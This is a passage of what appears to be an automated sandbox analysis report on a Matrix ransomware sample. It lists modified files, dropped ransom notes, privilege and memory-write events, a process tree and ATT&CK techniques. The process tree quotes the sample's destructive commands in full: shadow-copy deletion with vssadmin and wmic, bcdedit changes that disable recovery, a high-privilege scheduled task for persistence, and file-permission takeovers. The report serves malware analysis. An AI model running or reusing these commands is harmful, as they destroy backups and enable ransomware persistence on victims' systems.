Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-sampler.jar 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\kk.pak.DATA 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.help.ui_4.0.100.v20140401-0608.jar 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.71\goopdateres_sv.dll 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\nbexec.dll 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\jfxmedia.dll 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\stream_out\libstream_out_cycle_plugin.dll 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\kinit.exe 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.descriptorProvider.exsd 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-keyring-impl.xml 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\VideoLAN\VLC\VideoLAN Website.url 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.153.55\msedgeupdateres_tt.dll 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\Locales\id.pak 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\images\cursors\cursors.properties 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_proxy\identity_helper.Sparse.Stable.msix 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\mi.pak 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.addons.swt.nl_ja_4.4.0.v20140623020002.jar 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.153.55\msedgeupdateres_nb.dll 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\vlm_cmd.xml 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\codec\libfluidsynth_plugin.dll 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ja_5.5.0.165303.jar 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-ui_zh_CN.jar 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages.properties 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libugly_resampler_plugin.dll 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\Google\Chrome\Application\89.0.4389.114\WidevineCdm\_platform_specific\win_x64\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\javafx_font_t2k.dll 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\kn.pak 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.153.55\msedgeupdateres_sr-Latn-RS.dll 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\net.properties 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBlue.png 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\fr-CA.pak.DATA 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\include\win32\jni_md.h 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\bin\stopNetworkServer 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\Locales\pl.pak 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4432 schtasks.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 3824 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 3892 powershell.exe 3892 powershell.exe 4212 HH8cI51J64.exe 4212 HH8cI51J64.exe 4212 HH8cI51J64.exe 4212 HH8cI51J64.exe 4212 HH8cI51J64.exe 4212 HH8cI51J64.exe 4212 HH8cI51J64.exe 4212 HH8cI51J64.exe 4212 HH8cI51J64.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 4212 HH8cI51J64.exe -
Suspicious use of AdjustPrivilegeToken 48 IoCs
description pid Process Token: SeDebugPrivilege 3892 powershell.exe Token: SeDebugPrivilege 4212 HH8cI51J64.exe Token: SeLoadDriverPrivilege 4212 HH8cI51J64.exe Token: SeBackupPrivilege 680 vssvc.exe Token: SeRestorePrivilege 680 vssvc.exe Token: SeAuditPrivilege 680 vssvc.exe Token: SeIncreaseQuotaPrivilege 4772 WMIC.exe Token: SeSecurityPrivilege 4772 WMIC.exe Token: SeTakeOwnershipPrivilege 4772 WMIC.exe Token: SeLoadDriverPrivilege 4772 WMIC.exe Token: SeSystemProfilePrivilege 4772 WMIC.exe Token: SeSystemtimePrivilege 4772 WMIC.exe Token: SeProfSingleProcessPrivilege 4772 WMIC.exe Token: SeIncBasePriorityPrivilege 4772 WMIC.exe Token: SeCreatePagefilePrivilege 4772 WMIC.exe Token: SeBackupPrivilege 4772 WMIC.exe Token: SeRestorePrivilege 4772 WMIC.exe Token: SeShutdownPrivilege 4772 WMIC.exe Token: SeDebugPrivilege 4772 WMIC.exe Token: SeSystemEnvironmentPrivilege 4772 WMIC.exe Token: SeRemoteShutdownPrivilege 4772 WMIC.exe Token: SeUndockPrivilege 4772 WMIC.exe Token: SeManageVolumePrivilege 4772 WMIC.exe Token: 33 4772 WMIC.exe Token: 34 4772 WMIC.exe Token: 35 4772 WMIC.exe Token: 36 4772 WMIC.exe Token: SeIncreaseQuotaPrivilege 4772 WMIC.exe Token: SeSecurityPrivilege 4772 WMIC.exe Token: SeTakeOwnershipPrivilege 4772 WMIC.exe Token: SeLoadDriverPrivilege 4772 WMIC.exe Token: SeSystemProfilePrivilege 4772 WMIC.exe Token: SeSystemtimePrivilege 4772 WMIC.exe Token: SeProfSingleProcessPrivilege 4772 WMIC.exe Token: SeIncBasePriorityPrivilege 4772 WMIC.exe Token: SeCreatePagefilePrivilege 4772 WMIC.exe Token: SeBackupPrivilege 4772 WMIC.exe Token: SeRestorePrivilege 4772 WMIC.exe Token: SeShutdownPrivilege 4772 WMIC.exe Token: SeDebugPrivilege 4772 WMIC.exe Token: SeSystemEnvironmentPrivilege 4772 WMIC.exe Token: SeRemoteShutdownPrivilege 4772 WMIC.exe Token: SeUndockPrivilege 4772 WMIC.exe Token: SeManageVolumePrivilege 4772 WMIC.exe Token: 33 4772 WMIC.exe Token: 34 4772 WMIC.exe Token: 35 4772 WMIC.exe Token: 36 4772 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1492 wrote to memory of 2392 1492 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe 81 PID 1492 wrote to memory of 2392 1492 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe 81 PID 1492 wrote to memory of 2392 1492 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe 81 PID 1492 wrote to memory of 2800 1492 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe 83 PID 1492 wrote to memory of 2800 1492 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe 83 PID 1492 wrote to memory of 2800 1492 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe 83 PID 1492 wrote to memory of 2120 1492 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe 92 PID 1492 wrote to memory of 2120 1492 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe 92 PID 1492 wrote to memory of 2120 1492 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe 92 PID 2120 wrote to memory of 3892 2120 cmd.exe 94 PID 2120 wrote to memory of 3892 2120 cmd.exe 94 PID 2120 wrote to memory of 3892 2120 cmd.exe 94 PID 1492 wrote to memory of 1148 1492 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe 95 PID 1492 wrote to memory of 1148 1492 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe 95 PID 1492 wrote to memory of 1148 1492 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe 95 PID 1492 wrote to memory of 3516 1492 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe 96 PID 1492 wrote to memory of 3516 1492 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe 96 PID 1492 wrote to memory of 3516 1492 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe 96 PID 1148 wrote to memory of 3560 1148 cmd.exe 99 PID 1148 wrote to memory of 3560 1148 cmd.exe 99 PID 1148 wrote to memory of 3560 1148 cmd.exe 99 PID 3516 wrote to memory of 4152 3516 cmd.exe 100 PID 3516 wrote to memory of 4152 3516 cmd.exe 100 PID 3516 wrote to memory of 4152 3516 cmd.exe 100 PID 1148 wrote to memory of 864 1148 cmd.exe 101 PID 1148 wrote to memory of 864 1148 cmd.exe 101 PID 1148 wrote to memory of 864 1148 cmd.exe 101 PID 1492 wrote to memory of 3204 1492 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe 102 PID 1492 wrote to memory of 3204 1492 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe 102 PID 1492 wrote to memory of 3204 1492 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe 102 PID 1148 wrote to memory of 1644 1148 cmd.exe 104 PID 1148 wrote to memory of 1644 1148 cmd.exe 104 PID 1148 wrote to memory of 1644 1148 cmd.exe 104 PID 3204 wrote to memory of 2712 3204 cmd.exe 105 PID 3204 wrote to memory of 2712 3204 cmd.exe 105 PID 3204 wrote to memory of 2712 3204 cmd.exe 105 PID 3204 wrote to memory of 2556 3204 cmd.exe 106 PID 3204 wrote to memory of 2556 3204 cmd.exe 106 PID 3204 wrote to memory of 2556 3204 cmd.exe 106 PID 3204 wrote to memory of 2144 3204 cmd.exe 107 PID 3204 wrote to memory of 2144 3204 cmd.exe 107 PID 3204 wrote to memory of 2144 3204 cmd.exe 107 PID 3204 wrote to memory of 2808 3204 cmd.exe 108 PID 3204 wrote to memory of 2808 3204 cmd.exe 108 PID 3204 wrote to memory of 2808 3204 cmd.exe 108 PID 4152 wrote to memory of 4968 4152 wscript.exe 109 PID 4152 wrote to memory of 4968 4152 wscript.exe 109 PID 4152 wrote to memory of 4968 4152 wscript.exe 109 PID 2808 wrote to memory of 4592 2808 cmd.exe 110 PID 2808 wrote to memory of 4592 2808 cmd.exe 110 PID 2808 wrote to memory of 4592 2808 cmd.exe 110 PID 4592 wrote to memory of 4212 4592 HH8cI51J.exe 112 PID 4592 wrote to memory of 4212 4592 HH8cI51J.exe 112 PID 4968 wrote to memory of 4432 4968 cmd.exe 113 PID 4968 wrote to memory of 4432 4968 cmd.exe 113 PID 4968 wrote to memory of 4432 4968 cmd.exe 113 PID 4152 wrote to memory of 1640 4152 wscript.exe 114 PID 4152 wrote to memory of 1640 4152 wscript.exe 114 PID 4152 wrote to memory of 1640 4152 wscript.exe 114 PID 1640 wrote to memory of 2348 1640 cmd.exe 116 PID 1640 wrote to memory of 2348 1640 cmd.exe 116 PID 1640 wrote to memory of 2348 1640 cmd.exe 116 PID 4068 wrote to memory of 3824 4068 cmd.exe 121 PID 4068 wrote to memory of 3824 4068 cmd.exe 121 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2712 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe"C:\Users\Admin\AppData\Local\Temp\3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe"1⤵
- Matrix Ransomware
- Modifies extensions of user files
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1492 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe" "C:\Users\Admin\AppData\Local\Temp\NWT8dVfc.exe"2⤵PID:2392
-
-
C:\Users\Admin\AppData\Local\Temp\NWT8dVfc.exe"C:\Users\Admin\AppData\Local\Temp\NWT8dVfc.exe" -n2⤵
- Executes dropped EXE
PID:2800
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\dx7HBuwM.txt"2⤵
- Suspicious use of WriteProcessMemory
PID:2120 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3892
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\BaI9ufue.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1148 -
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\BaI9ufue.bmp" /f3⤵
- Sets desktop wallpaper using registry
PID:3560
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f3⤵PID:864
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f3⤵PID:1644
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\6UkSb2Kq.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:3516 -
C:\Windows\SysWOW64\wscript.exewscript //B //Nologo "C:\Users\Admin\AppData\Roaming\6UkSb2Kq.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4152 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\ks25Ghwe.bat" /sc minute /mo 5 /RL HIGHEST /F4⤵
- Suspicious use of WriteProcessMemory
PID:4968 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\ks25Ghwe.bat" /sc minute /mo 5 /RL HIGHEST /F5⤵
- Creates scheduled task(s)
PID:4432
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA4⤵
- Suspicious use of WriteProcessMemory
PID:1640 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /I /tn DSHCA5⤵PID:2348
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lKSLHCZo.bat" "C:\ProgramData\Microsoft\Network\Downloader\qmgr.db""2⤵
- Suspicious use of WriteProcessMemory
PID:3204 -
C:\Windows\SysWOW64\attrib.exeattrib -R -A -S "C:\ProgramData\Microsoft\Network\Downloader\qmgr.db"3⤵
- Views/modifies file attributes
PID:2712
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Network\Downloader\qmgr.db" /E /G Admin:F /C3⤵PID:2556
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Network\Downloader\qmgr.db"3⤵
- Modifies file permissions
PID:2144
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c HH8cI51J.exe -accepteula "qmgr.db" -nobanner3⤵
- Suspicious use of WriteProcessMemory
PID:2808 -
C:\Users\Admin\AppData\Local\Temp\HH8cI51J.exeHH8cI51J.exe -accepteula "qmgr.db" -nobanner4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4592 -
C:\Users\Admin\AppData\Local\Temp\HH8cI51J64.exeHH8cI51J.exe -accepteula "qmgr.db" -nobanner5⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:4212
-
-
-
-
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\ks25Ghwe.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4068 -
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /All /Quiet2⤵
- Interacts with shadow copies
PID:3824
-
-
C:\Windows\System32\Wbem\WMIC.exewmic SHADOWCOPY DELETE2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4772
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No2⤵
- Modifies boot configuration data using bcdedit
PID:4596
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:1936
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Delete /TN DSHCA /F2⤵PID:3572
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:680
Network
MITRE ATT&CK Enterprise v6
Persistence
Hidden Files and Directories
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
File Deletion
2File and Directory Permissions Modification
1Hidden Files and Directories
1Modify Registry
2